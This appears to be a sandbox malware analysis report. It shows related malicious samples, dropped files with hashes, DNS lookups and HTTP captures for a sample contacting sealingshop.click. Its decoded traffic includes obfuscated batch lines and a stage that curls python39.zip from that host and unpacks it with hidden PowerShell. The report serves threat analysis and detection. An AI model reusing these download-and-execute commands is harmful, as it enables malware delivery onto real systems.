	https://kqpsj7f.r.us-east-1.awstrack.me/L0/https:%2F%2Fwww.google.az%2Furl%3Fsa=t%26rct=j%26q=%26esrc=s%26source=web%26cd=2%26cad=rja%26uact=8%26ved=0ahUKEwjfsYf_0KjXAhUFWpAKHfWLAIUQqUMILDAB%26url=https%253A%252F%252Fwww.google.az%252Furl%253Fsa%253Dt%2526source%253Dweb%2526rct%253Dj%2526url%253D%252Famp%252Fs%252F%252561%252563%252574%252569%252576%252565%252570%252561%252567%252565%252532%252534%25252E%252567%252569%252574%252568%252575%252562%25252E%252569%25256F%25252F%252539%252538%252534%252539%252539%252530%252533%252533%252536%252532%252537%252532%252533%252564%252533%252534%252530%252563%252565%252562%252531%252536%252535%252565%252534%252563%252566%252533%252565%252565%252565%252530%252531%252533%252539%252534%252563%252532%252530%252539%252537%252532%252564%252566%252561%252539%252565%252565%252530%252564%252533%252535%252533%252530%252530%252565%252564%252531%252563%252539%252563%252563%252532%252537%252561%252535%252566%252562%252562%252563%252534%252539%252535%252535%252538%252539%252533%252532%252531%252532%252532%252532%252530%252530%252530%252539%252538%252533%252538%252539%252532%252533%252538%252537%252533%252530%252534%252538%252534%25252F%252523bmF0YWxpZS5naWxiZXJ0QGJlbm5ldHRzLmNvLnVr/1/010001938e527df9-4f6015d9-59ba-4e09-b0e8-e32ef0a1897d-000000/T4r9m3LjWkmioIlkrwpVAx5Ks7w=402	Get hash	malicious	Unknown	Browse	52.149.20.212 13.107.246.63
	Itelyum_Regeneration_S.P.A___Bank_of_America_KYC_Outreach.eml	Get hash	malicious	Unknown	Browse	52.149.20.212 13.107.246.63
74954a0c86284d0d6e1c4efefe92b521	document.lnk.download.lnk	Get hash	malicious	Unknown	Browse	104.21.36.187
	ZOL2mIYAUH.exe	Get hash	malicious	Phemedrone Stealer, PureLog Stealer, XWorm, zgRAT	Browse	104.21.36.187
	18sFhgSyVK.exe	Get hash	malicious	XWorm	Browse	104.21.36.187
	KEFttAEb.vbs	Get hash	malicious	PureCrypter	Browse	104.21.36.187
	hkQx7f6zzw.exe	Get hash	malicious	TVrat	Browse	104.21.36.187
	hkQx7f6zzw.exe	Get hash	malicious	TVrat	Browse	104.21.36.187
	reservation .exe	Get hash	malicious	TVrat	Browse	104.21.36.187
	oZ3vtWXObB.exe	Get hash	malicious	TVrat	Browse	104.21.36.187
	aeyh21MAtA.exe	Get hash	malicious	TVrat	Browse	104.21.36.187
	wjpP1EOX0L.exe	Get hash	malicious	TVrat	Browse	104.21.36.187
3b5074b1b5d032e5620f69f9f700ff0e	Order_DEC2024.wsf	Get hash	malicious	Remcos	Browse	104.21.36.187
	Bank Swift and SOA PRN0072003410853_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.36.187
	lnvoice-1620804301.pdf .js	Get hash	malicious	RHADAMANTHYS	Browse	104.21.36.187
	lnvoice-1620804301.pdf (1).js	Get hash	malicious	RHADAMANTHYS	Browse	104.21.36.187
	https://kqpsj7f.r.us-east-1.awstrack.me/L0/https:%2F%2Fwww.google.az%2Furl%3Fsa=t%26rct=j%26q=%26esrc=s%26source=web%26cd=2%26cad=rja%26uact=8%26ved=0ahUKEwjfsYf_0KjXAhUFWpAKHfWLAIUQqUMILDAB%26url=https%253A%252F%252Fwww.google.az%252Furl%253Fsa%253Dt%2526source%253Dweb%2526rct%253Dj%2526url%253D%252Famp%252Fs%252F%252561%252563%252574%252569%252576%252565%252570%252561%252567%252565%252532%252534%25252E%252567%252569%252574%252568%252575%252562%25252E%252569%25256F%25252F%252539%252538%252534%252539%252539%252530%252533%252533%252536%252532%252537%252532%252533%252564%252533%252534%252530%252563%252565%252562%252531%252536%252535%252565%252534%252563%252566%252533%252565%252565%252565%252530%252531%252533%252539%252534%252563%252532%252530%252539%252537%252532%252564%252566%252561%252539%252565%252565%252530%252564%252533%252535%252533%252530%252530%252565%252564%252531%252563%252539%252563%252563%252532%252537%252561%252535%252566%252562%252562%252563%252534%252539%252535%252535%252538%252539%252533%252532%252531%252532%252532%252532%252530%252530%252530%252539%252538%252533%252538%252539%252532%252533%252538%252537%252533%252530%252534%252538%252534%25252F%252523bmF0YWxpZS5naWxiZXJ0QGJlbm5ldHRzLmNvLnVr/1/010001938e527df9-4f6015d9-59ba-4e09-b0e8-e32ef0a1897d-000000/T4r9m3LjWkmioIlkrwpVAx5Ks7w=402	Get hash	malicious	Unknown	Browse	104.21.36.187
	Itelyum_Regeneration_S.P.A___Bank_of_America_KYC_Outreach.eml	Get hash	malicious	Unknown	Browse	104.21.36.187
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	104.21.36.187
	MicrosoftScript.ps1	Get hash	malicious	AsyncRAT, PureLog Stealer	Browse	104.21.36.187
	file.exe	Get hash	malicious	Discord Token Stealer, DotStealer	Browse	104.21.36.187
	Order NO 000293988494948595850000595995000.exe	Get hash	malicious	AgentTesla, GuLoader	Browse	104.21.36.187

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\Public\python39\DLLs\_asyncio.pyd	PFD and P&ID - PDF Checker.exe	Get hash	malicious	Unknown	Browse
	Fusion 360 Client Downloader.exe	Get hash	malicious	Unknown	Browse
	Fusion 360 Client Downloader.exe	Get hash	malicious	Unknown	Browse
	lCOMVCKl7v.exe	Get hash	malicious	Unknown	Browse
	0TGd8Wvu1l.exe	Get hash	malicious	SmokeLoader	Browse
	SecuriteInfo.com.Win32.PWSX-gen.20615.6677.exe	Get hash	malicious	DanaBot, SmokeLoader	Browse
	8ioQ0C4Zj5.exe	Get hash	malicious	DanaBot, SmokeLoader	Browse
	file.exe	Get hash	malicious	DanaBot, SmokeLoader	Browse
	L9Go08pX31.exe	Get hash	malicious	Unknown	Browse
	L9Go08pX31.exe	Get hash	malicious	Unknown	Browse

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.8528117966571735
Encrypted:	false
SSDEEP:	3072:gJjJGtpTq2yv1AuNZRY3diu8iBVqFcDLp0J:hpezNZQd58ibLp0J
MD5:	716E5153C6DA8EB7E3C2A34EBA8D4797
SHA1:	B29FECB1BFF5E1DB0734EB746B00DAFCB69914A8
SHA-256:	4ACD656563E69F6F7C01B9D11EAE72E60719EE77C92C57E18A57175AC8A3A40B
SHA-512:	ABDF2FD4F6DF01DCD1593E6BF78476C1F7E2280F1B5E5E008C467F5BE60A7B66A43712D8AB4A2FEA14C5AC67DD7B886C7F9641DA606ACA8CF02E5E419160BF6E
Malicious:	false
Preview:	...M........@..@.-...{5..;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................4..........E.[.rXrX.#.........`h.................h.5.......3.....X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

Process:	C:\Windows\System32\curl.exe
File Type:	Unicode text, UTF-16, little-endian text, with very long lines (32767), with no line terminators
Category:	modified
Size (bytes):	1784640
Entropy (8bit):	4.443752359438931
Encrypted:	false
SSDEEP:	192:edl9GHAB0xwbbNvbrcb1dvb61Bb1bbbbbbbbbbbbbbbxkbbbbbbbbbbbbbbbbbbP:ef9GHABkz8heeeeeeeeeeeeeeeeeeee6
MD5:	383F3D329EB26A5155AF5E87FEE989C8
SHA1:	F8D3A42A18823FFF17F785B39BD4864424AED5EB
SHA-256:	372323161EE8CD7FC010D564687E089C8760B949A760D99E67C6FC58329C0D9C
SHA-512:	BB5E0EDFE575C04A3C5412C09E4813E95A9F5DD41A614BFFE846F697356EEE767982379517B74468BE67A2B29C123C98A5072FD6778AD55CD2BEA3499E225EE1
Malicious:	false
Preview:	....set k123456778232365743kk = 2343445546567..set k12345677823562343kk = 23434453468567..set k12345566778232343kk = 234367445564546567..set k123456778232365743kk = 2343445546567..set k12345677823562343kk = 2343445346567..set k12345566778232343kk = 2343674564546567..set k123456778232365743kk = 2343445546567..set k12345677823562343kk = 2343445346567..set k12345566778232343kk = 2343674564546567..set k123456778232365743kk = 23434455946567..set k12345677823562343kk = 2343445346567..set k12345566778232343kk = 234367144564546567..set k123456778232365743kk = 2343445546567435..set k12345677823562343kk = 2343445346567..set k12345566778232343kk = 2343674564546567..set k123456778232365743kk = 2343445546567..set k12345677823562343kk = 2343445346567..set k12345566778232343kk = 2343674564546567..set k123456778232365743kk = 2343445546567..set k12345677823562343kk = 2343445346567..set k12345566778232343kk = 23436745645465674353..set k123456778232365743kk = 2343445546567..set k12345677823562343kk = 234

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	65256
Entropy (8bit):	5.94772703779214
Encrypted:	false
SSDEEP:	768:qKMg5KvjSGhtDwdt9psnqR0RWqJ7J4j+Ba36oWeU9MRIXYntRgDG4yj94hg:qjv+GbWp/Wk6oWezRIXYnbsyj9X
MD5:	C89B5EC34A76D00543D55748A7275CB1
SHA1:	341A61E181FC7957D326080354135E20D3D16FAB
SHA-256:	3E521E119CFAD53C8FCF67BBF26DE2ECFFE24CB13079F36A22339F0F8AD297A6
SHA-512:	B21514674BDB7CA392E35BFE1ECB3DBBE16BD8DAF38FBEAFB6182253551F3CDD37833DF523AB6181555A6547F764224626FCB6403429DECCA1ED58DADE2B01EF
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: PFD and P&ID - PDF Checker.exe, Detection: malicious, Browse Filename: Fusion 360 Client Downloader.exe, Detection: malicious, Browse Filename: Fusion 360 Client Downloader.exe, Detection: malicious, Browse Filename: lCOMVCKl7v.exe, Detection: malicious, Browse Filename: 0TGd8Wvu1l.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Win32.PWSX-gen.20615.6677.exe, Detection: malicious, Browse Filename: 8ioQ0C4Zj5.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: L9Go08pX31.exe, Detection: malicious, Browse Filename: L9Go08pX31.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........}..w...w...w.......w......w......w......w......w......w.......w...w..Tw......w......w......w......w..Rich.w..........PE..d......`.........." .....`................................................... ......:#....`.............................................P.......d...................................@v..T............................v..8............p..0............................text....^.......`.................. ..`.rdata...J...p...L...d..............@..@.data.... ..........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................

Process:	C:\Users\Public\python39\python.exe
File Type:	python 3.9 byte-compiled
Category:	dropped
Size (bytes):	4134
Entropy (8bit):	5.360572389488096
Encrypted:	false
SSDEEP:	96:lg1NzUuGd+P2sKNwW79D2j82xnCg8Q/Ks/qN+Bj0ui:o4BRdRD1YCM/KsSN+Bj0ui
MD5:	FA335AD1F20A2911301302828A003713
SHA1:	088620437E79AC313AA3CFE2F935BCCE00789A18
SHA-256:	C2D1FD3360B2C8408814531A9BF3EB65D23F725A17D2A30FC2215E6BE2D8D881
SHA-512:	3FC975A092591AC453432A82A7473F6AD10F8BF873957E4FC8A83B95FF6DC83BF46C907686D99E7B61DBDC8D6DF4EF7B5ACB62909828ACE23D9C40FC7A95C0A2
Malicious:	false
Preview:	a.......~=Bg.........................@...s....d.Z.g.d...Z.d.g.e...Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.G.d.d...d...Z.e.d.d.e...Z.e.d.d.e...Z.e.d.d.e...Z.e.d.d.e...Z.e.d.d.e...Z.e.d.d.e...Z.e.d.d.e...Z.e.d.d.e...Z.e.d.d.e...Z.e.d.d.e...Z.d.S.).af...Record of phased-in incompatible language changes...Each line is of the form:.. FeatureName = "_Feature(" OptionalRelease "," MandatoryRelease ",". CompilerFlag ")"..where, normally, OptionalRelease < MandatoryRelease, and both are 5-tuples.of the same form as sys.version_info:.. (PY_MAJOR_VERSION, # the 2 in 2.1.0a3; an int. PY_MINOR_VERSION, # the 1; an int. PY_MICRO_VERSION, # the 0; an int. PY_RELEASE_LEVEL, # "alpha", "beta", "candidate" or "final"; string. PY_RELEASE_SERIAL # the 3; an int. )..OptionalRelease records the first release in which.. from __future__ import FeatureName..was accepted...In the case of MandatoryReleases that have not yet occurred,.MandatoryRelease pre

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Dec 4 10:20:09 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2677
Entropy (8bit):	3.988643159120672
Encrypted:	false
SSDEEP:	48:8CiddTF1nxHuidAKZdA19ehwiZUklqehay+3:8nzyZy
MD5:	42508A9958AED6F615289CD313CDA9F9
SHA1:	55D777E00F8E707DC3DCEE0DE0A135ED53B58019
SHA-256:	A162B50269CCAAE8852774482C668D61CDE63B91721659ABDED3D48C4F6DDD43
SHA-512:	D5ACFD99A605CDF2FEEEFA4A7EE220F086D122836C14BB992E645846F5D3DCE7D2F1642736F4C025CD8315F1D76C35944CD2AB03E9DA0EDA24BD8419AF6DA1D3
Malicious:	false
Preview:	L..................F.@.. ...$+.,.....V.z>F..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Y.Z....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.Z....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.Z....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.Z..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.Z...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........Q........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 4, 2024 12:20:00.399885893 CET	192.168.2.5	1.1.1.1	0x275	Standard query (0)	sealingshop.click	A (IP address)	IN (0x0001)	false
Dec 4, 2024 12:20:08.159594059 CET	192.168.2.5	1.1.1.1	0x74fb	Standard query (0)	google.com	A (IP address)	IN (0x0001)	false
Dec 4, 2024 12:20:08.159796000 CET	192.168.2.5	1.1.1.1	0xc271	Standard query (0)	google.com	65	IN (0x0001)	false
Dec 4, 2024 12:20:10.807305098 CET	192.168.2.5	1.1.1.1	0x821d	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Dec 4, 2024 12:20:10.807496071 CET	192.168.2.5	1.1.1.1	0x231b	Standard query (0)	www.google.com	65	IN (0x0001)	false
Dec 4, 2024 12:20:17.091223001 CET	192.168.2.5	1.1.1.1	0x6cb8	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Dec 4, 2024 12:20:17.091388941 CET	192.168.2.5	1.1.1.1	0x60b2	Standard query (0)	www.google.com	65	IN (0x0001)	false
Dec 4, 2024 12:20:20.362380981 CET	192.168.2.5	1.1.1.1	0xe18c	Standard query (0)	ogs.google.com	A (IP address)	IN (0x0001)	false
Dec 4, 2024 12:20:20.362665892 CET	192.168.2.5	1.1.1.1	0xa6a7	Standard query (0)	ogs.google.com	65	IN (0x0001)	false
Dec 4, 2024 12:20:21.024188995 CET	192.168.2.5	1.1.1.1	0x12b4	Standard query (0)	play.google.com	A (IP address)	IN (0x0001)	false
Dec 4, 2024 12:20:21.024713039 CET	192.168.2.5	1.1.1.1	0x4c4b	Standard query (0)	play.google.com	65	IN (0x0001)	false
Dec 4, 2024 12:20:23.312522888 CET	192.168.2.5	1.1.1.1	0x50ee	Standard query (0)	apis.google.com	A (IP address)	IN (0x0001)	false
Dec 4, 2024 12:20:23.312829971 CET	192.168.2.5	1.1.1.1	0x4408	Standard query (0)	apis.google.com	65	IN (0x0001)	false
Dec 4, 2024 12:20:24.948412895 CET	192.168.2.5	1.1.1.1	0x7584	Standard query (0)	play.google.com	A (IP address)	IN (0x0001)	false
Dec 4, 2024 12:20:24.948792934 CET	192.168.2.5	1.1.1.1	0x5a8a	Standard query (0)	play.google.com	65	IN (0x0001)	false
Dec 4, 2024 12:20:26.746567965 CET	192.168.2.5	1.1.1.1	0x1c2c	Standard query (0)	apis.google.com	A (IP address)	IN (0x0001)	false
Dec 4, 2024 12:20:26.746974945 CET	192.168.2.5	1.1.1.1	0x25aa	Standard query (0)	apis.google.com	65	IN (0x0001)	false

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 4, 2024 12:20:00.639394999 CET	1.1.1.1	192.168.2.5	0x275	No error (0)	sealingshop.click		104.21.36.187	A (IP address)	IN (0x0001)	false
Dec 4, 2024 12:20:00.639394999 CET	1.1.1.1	192.168.2.5	0x275	No error (0)	sealingshop.click		172.67.198.144	A (IP address)	IN (0x0001)	false
Dec 4, 2024 12:20:08.299952984 CET	1.1.1.1	192.168.2.5	0xc271	No error (0)	google.com			65	IN (0x0001)	false
Dec 4, 2024 12:20:08.299969912 CET	1.1.1.1	192.168.2.5	0x74fb	No error (0)	google.com		142.250.181.142	A (IP address)	IN (0x0001)	false
Dec 4, 2024 12:20:10.944619894 CET	1.1.1.1	192.168.2.5	0x821d	No error (0)	www.google.com		142.250.181.68	A (IP address)	IN (0x0001)	false
Dec 4, 2024 12:20:10.945029974 CET	1.1.1.1	192.168.2.5	0x231b	No error (0)	www.google.com			65	IN (0x0001)	false
Dec 4, 2024 12:20:17.230690002 CET	1.1.1.1	192.168.2.5	0x6cb8	No error (0)	www.google.com		172.217.21.36	A (IP address)	IN (0x0001)	false
Dec 4, 2024 12:20:17.230999947 CET	1.1.1.1	192.168.2.5	0x60b2	No error (0)	www.google.com			65	IN (0x0001)	false
Dec 4, 2024 12:20:20.499830961 CET	1.1.1.1	192.168.2.5	0xe18c	No error (0)	ogs.google.com	www3.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 4, 2024 12:20:20.499830961 CET	1.1.1.1	192.168.2.5	0xe18c	No error (0)	www3.l.google.com		172.217.19.206	A (IP address)	IN (0x0001)	false
Dec 4, 2024 12:20:20.500508070 CET	1.1.1.1	192.168.2.5	0xa6a7	No error (0)	ogs.google.com	www3.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 4, 2024 12:20:21.162700891 CET	1.1.1.1	192.168.2.5	0x12b4	No error (0)	play.google.com		172.217.19.238	A (IP address)	IN (0x0001)	false
Dec 4, 2024 12:20:23.449659109 CET	1.1.1.1	192.168.2.5	0x4408	No error (0)	apis.google.com	plus.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 4, 2024 12:20:23.452130079 CET	1.1.1.1	192.168.2.5	0x50ee	No error (0)	apis.google.com	plus.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 4, 2024 12:20:23.452130079 CET	1.1.1.1	192.168.2.5	0x50ee	No error (0)	plus.l.google.com		172.217.17.78	A (IP address)	IN (0x0001)	false
Dec 4, 2024 12:20:25.085555077 CET	1.1.1.1	192.168.2.5	0x7584	No error (0)	play.google.com		172.217.19.238	A (IP address)	IN (0x0001)	false
Dec 4, 2024 12:20:26.885440111 CET	1.1.1.1	192.168.2.5	0x25aa	No error (0)	apis.google.com	plus.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 4, 2024 12:20:26.885899067 CET	1.1.1.1	192.168.2.5	0x1c2c	No error (0)	apis.google.com	plus.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 4, 2024 12:20:26.885899067 CET	1.1.1.1	192.168.2.5	0x1c2c	No error (0)	plus.l.google.com		172.217.17.78	A (IP address)	IN (0x0001)	false

Timestamp	Bytes transferred	Direction	Data
2024-12-04 11:20:01 UTC	286	OUT	GET /bat/encode/rose_tien_en.txt?a=342234erererefdgdsjfwiowjefisjidfsojfoijs4543544325445344eiofujoisuedsfdddddjjjjkfoisuefoiu434534343iosuioeufiosuio453453543543344444345345645745suefiosuieofusoiufiosefuioeuio HTTP/1.1 Host: sealingshop.click User-Agent: curl/7.83.1 Accept: /
2024-12-04 11:20:02 UTC	968	IN	HTTP/1.1 200 OK Date: Wed, 04 Dec 2024 11:20:02 GMT Content-Type: text/plain Transfer-Encoding: chunked Connection: close last-modified: Thu, 07 Nov 2024 12:46:38 GMT etag: W/"1b3b40-672cb6ae-6f51b57c894e311f;br" vary: Accept-Encoding platform: hostinger panel: hpanel x-turbo-charged-by: LiteSpeed CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GFI6ybrzDAHvOjsFx3%2FPSMpeZQ%2B8Si5E4if9T%2BN6LIADAw8fm%2FkI0Ft0qD5QBsILxPVRrtEhCowMX7PpAHjtw0Nk%2BxxXFVBzJapXmI1ouo2D2U7wYpAupKFX78DC%2FovNmcZMAA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ecb67a57d155e60-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1672&min_rtt=1667&rtt_var=635&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2841&recv_bytes=924&delivery_rate=1708601&cwnd=248&unsent_bytes=0&cid=b1776e6e2d5c7f3c&ts=949&x=0"
2024-12-04 11:20:02 UTC	401	IN	Data Raw: 37 63 61 64 0d 0a ff fe 0d 0a 73 65 74 20 6b 31 32 33 34 35 36 37 37 38 32 33 32 33 36 35 37 34 33 6b 6b 20 3d 20 32 33 34 33 34 34 35 35 34 36 35 36 37 0d 0a 73 65 74 20 6b 31 32 33 34 35 36 37 37 38 32 33 35 36 32 33 34 33 6b 6b 20 3d 20 32 33 34 33 34 34 35 33 34 36 38 35 36 37 0d 0a 73 65 74 20 6b 31 32 33 34 35 35 36 36 37 37 38 32 33 32 33 34 33 6b 6b 20 3d 20 32 33 34 33 36 37 34 34 35 35 36 34 35 34 36 35 36 37 0d 0a 73 65 74 20 6b 31 32 33 34 35 36 37 37 38 32 33 32 33 36 35 37 34 33 6b 6b 20 3d 20 32 33 34 33 34 34 35 35 34 36 35 36 37 0d 0a 73 65 74 20 6b 31 32 33 34 35 36 37 37 38 32 33 35 36 32 33 34 33 6b 6b 20 3d 20 32 33 34 33 34 34 35 33 34 36 35 36 37 0d 0a 73 65 74 20 6b 31 32 33 34 35 35 36 36 37 37 38 32 33 32 33 34 33 6b 6b 20 3d 20 Data Ascii: 7cadset k123456778232365743kk = 2343445546567set k12345677823562343kk = 23434453468567set k12345566778232343kk = 234367445564546567set k123456778232365743kk = 2343445546567set k12345677823562343kk = 2343445346567set k12345566778232343kk =
2024-12-04 11:20:02 UTC	1369	IN	Data Raw: 0d 0a 73 65 74 20 6b 31 32 33 34 35 36 37 37 38 32 33 32 33 36 35 37 34 33 6b 6b 20 3d 20 32 33 34 33 34 34 35 35 39 34 36 35 36 37 0d 0a 73 65 74 20 6b 31 32 33 34 35 36 37 37 38 32 33 35 36 32 33 34 33 6b 6b 20 3d 20 32 33 34 33 34 34 35 33 34 36 35 36 37 0d 0a 73 65 74 20 6b 31 32 33 34 35 35 36 36 37 37 38 32 33 32 33 34 33 6b 6b 20 3d 20 32 33 34 33 36 37 31 34 34 35 36 34 35 34 36 35 36 37 0d 0a 73 65 74 20 6b 31 32 33 34 35 36 37 37 38 32 33 32 33 36 35 37 34 33 6b 6b 20 3d 20 32 33 34 33 34 34 35 35 34 36 35 36 37 34 33 35 0d 0a 73 65 74 20 6b 31 32 33 34 35 36 37 37 38 32 33 35 36 32 33 34 33 6b 6b 20 3d 20 32 33 34 33 34 34 35 33 34 36 35 36 37 0d 0a 73 65 74 20 6b 31 32 33 34 35 35 36 36 37 37 38 32 33 32 33 34 33 6b 6b 20 3d 20 32 33 34 33 36 Data Ascii: set k123456778232365743kk = 23434455946567set k12345677823562343kk = 2343445346567set k12345566778232343kk = 234367144564546567set k123456778232365743kk = 2343445546567435set k12345677823562343kk = 2343445346567set k12345566778232343kk = 23436
2024-12-04 11:20:02 UTC	1369	IN	Data Raw: 32 33 34 35 36 37 37 66 64 38 32 33 35 36 32 33 34 33 6b 6b 20 3d 20 32 33 34 33 34 34 35 33 34 36 35 36 37 0d 0a 73 65 74 20 6b 31 32 33 34 35 35 36 36 37 37 38 32 33 32 33 34 33 6b 6b 20 3d 20 32 33 34 33 36 37 34 35 36 34 35 34 36 35 36 37 0d 0a 73 65 74 20 6b 31 32 33 34 35 36 37 37 38 32 33 32 33 36 35 37 34 33 6b 6b 20 3d 20 32 33 34 33 34 34 35 35 34 34 36 35 36 37 0d 0a 73 65 74 20 6b 31 32 33 34 35 36 37 37 38 32 33 35 36 32 33 34 33 6b 6b 20 3d 20 32 33 34 33 34 34 35 33 34 36 35 36 37 0d 0a 73 65 74 20 6b 31 32 33 34 35 35 36 36 37 37 38 32 33 32 33 34 33 6b 6b 20 3d 20 32 33 34 33 36 37 34 35 36 34 35 34 36 35 36 37 0d 0a 73 65 74 20 6b 31 32 33 34 35 36 37 37 38 66 32 33 32 33 36 35 37 34 33 6b 6b 20 3d 20 32 33 34 33 34 34 35 35 34 36 35 36 Data Ascii: 2345677fd823562343kk = 2343445346567set k12345566778232343kk = 2343674564546567set k123456778232365743kk = 23434455446567set k12345677823562343kk = 2343445346567set k12345566778232343kk = 2343674564546567set k123456778f232365743kk = 234344554656
2024-12-04 11:20:02 UTC	1369	IN	Data Raw: 33 34 33 6b 6b 20 3d 20 32 33 34 33 36 34 37 34 35 36 34 35 34 36 35 36 37 34 35 33 34 35 34 33 0d 0a 73 65 74 20 6b 31 32 33 34 35 36 37 37 38 32 33 32 33 36 35 37 34 33 6b 6b 20 3d 20 32 33 34 33 34 34 35 35 34 36 35 36 37 0d 0a 73 65 74 20 6b 31 32 33 34 35 36 37 37 38 32 33 35 36 32 33 34 33 6b 6b 20 3d 20 32 33 34 33 34 34 35 33 34 36 35 36 37 0d 0a 73 65 74 20 6b 31 32 33 34 35 35 36 36 37 66 37 38 32 33 32 33 34 33 6b 6b 20 3d 20 32 33 34 33 36 37 34 35 36 34 35 34 36 35 36 37 0d 0a 73 65 74 20 6b 31 32 33 34 35 36 37 37 38 32 33 32 33 36 35 37 34 33 6b 6b 20 3d 20 32 33 34 33 34 34 35 35 34 36 35 36 37 0d 0a 73 65 74 20 6b 31 32 33 34 35 36 37 37 38 32 33 35 36 32 33 34 33 6b 6b 20 3d 20 32 33 34 33 34 34 35 33 34 36 35 36 37 0d 0a 73 65 74 20 6b Data Ascii: 343kk = 234364745645465674534543set k123456778232365743kk = 2343445546567set k12345677823562343kk = 2343445346567set k123455667f78232343kk = 2343674564546567set k123456778232365743kk = 2343445546567set k12345677823562343kk = 2343445346567set k
2024-12-04 11:20:02 UTC	1369	IN	Data Raw: 5c 70 79 74 68 6f 6e 33 39 22 3b 0d 0a 63 75 72 6c 20 68 74 74 70 73 3a 2f 2f 73 65 61 6c 69 6e 67 73 68 6f 70 2e 63 6c 69 63 6b 2f 61 70 70 2f 70 79 74 68 6f 6e 33 39 2e 7a 69 70 20 2d 6f 20 22 43 3a 5c 5c 55 73 65 72 73 5c 5c 50 75 62 6c 69 63 5c 5c 70 79 74 68 6f 6e 33 39 5c 5c 70 79 74 68 6f 6e 33 39 2e 7a 69 70 22 0d 0a 70 6f 77 65 72 73 68 65 6c 6c 20 2d 77 69 6e 64 6f 77 73 74 79 6c 65 20 68 69 64 64 65 6e 20 45 78 70 61 6e 64 2d 41 72 63 68 69 76 65 20 43 3a 5c 5c 55 73 65 72 73 5c 5c 50 75 62 6c 69 63 5c 5c 70 79 74 68 6f 6e 33 39 5c 5c 70 79 74 68 6f 6e 33 39 2e 7a 69 70 20 2d 44 65 73 74 69 6e 61 74 69 6f 6e 50 61 74 68 20 43 3a 5c 5c 55 73 65 72 73 5c 5c 50 75 62 6c 69 63 5c 5c 70 79 74 68 6f 6e 33 39 0d 0a 63 75 72 6c 20 68 74 74 70 73 3a 2f Data Ascii: \python39";curl https://sealingshop.click/app/python39.zip -o "C:\\Users\\Public\\python39\\python39.zip"powershell -windowstyle hidden Expand-Archive C:\\Users\\Public\\python39\\python39.zip -DestinationPath C:\\Users\\Public\\python39curl https:/
